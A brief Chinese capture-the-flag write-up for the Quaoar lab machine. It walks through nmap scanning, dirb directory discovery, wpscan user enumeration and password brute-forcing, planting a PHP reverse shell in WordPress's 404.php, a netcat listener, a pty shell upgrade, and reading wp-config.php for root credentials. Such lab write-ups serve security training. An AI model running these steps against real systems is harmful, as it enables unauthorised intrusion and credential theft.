Quaoar

nmap进行信息收集

nmap -sP 192.168.16.0/24扫描同网段主机，查询靶机的IP地址。

nmap -sT 192.168.16.140扫描靶机开放了那些端口。

通过命令dirb http://192.168.16.140对网站进行目录扫描,扫描到了网站后台登陆界面

用户名枚举:wpscan --url http:192.168.16.140/wordpress --enumerate u,查询出3个用户(其中root用户为我自己添加的,不是靶机本身所带)

暴力破解:wpscan --url http://192.168.16.140/wordpress/wp-login.php -P /root/1.txt -U admin,对admin这个用户进行暴力破解,其中.txt文件为字典

可以看到admin用户的密码为admin,输入admin,admin成功登入后台

404.php代码里插入反弹shell代码,访问404页面触发反弹shell
此处使用的webshell为kali自带，为/usr/share/webshells/php/php-reverse-shell.php

nc -lvvp 1234对端口1234进行监听
利用python -c 'import pty;pty.spawn("/bin/bash")'获得一个新的shell

在该文件夹下有个root文件夹，但是进不去，需要提权，在/home/wpadmin文件下的flag可以查看
读取配置文件,拿到root用户和密码，/var/www/wordpress/wp-config.php

查看flag